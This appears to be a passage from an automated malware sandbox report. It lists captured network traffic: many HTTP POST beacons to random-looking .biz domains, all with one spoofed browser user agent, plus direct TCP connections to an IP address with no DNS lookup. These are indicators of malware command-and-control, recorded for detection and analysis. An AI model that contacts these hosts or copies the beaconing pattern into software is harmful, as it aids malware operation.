Source: global traffic HTTP traffic detected: POST /rlifsams HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /oyataqebqvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /umdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uilsnghvu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mtnqoxhnqxwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ksosgyughs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bduojpmqwclgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qgyptpaacdeujk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mtvhnvlftyscrey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /saunpuqsumkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /essg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fwgtnqaffg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lrpwhcqxkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cdficgkndhspr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /li HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wfktgrobq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /chtmfsmomhgtgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qmsckions HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jpral HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kaxprjwfiybl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /eyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tqtlouxtvhvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ckgw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cceha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nkpyoqcnfxfvdsvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ocoeycxqebnmcofx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mbcjcfmxxflkpmuo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vdswmyn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jdxpe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cfhujvjhaho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qjjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jmsidvkpax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /umjblkbuugg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /huutba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /u HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /njmokryu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ucx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rvqem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rngnlo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ociacchi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nifaqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fnji HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bsjqpgxufr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kuxiqsojkmip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lrnrnpb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pgikxpkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /llhapbqwborcds HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /suw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pcsirhcwmnroqpc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qakf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gtcuyk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pjgdeytc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /imppcncbrvlqyyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
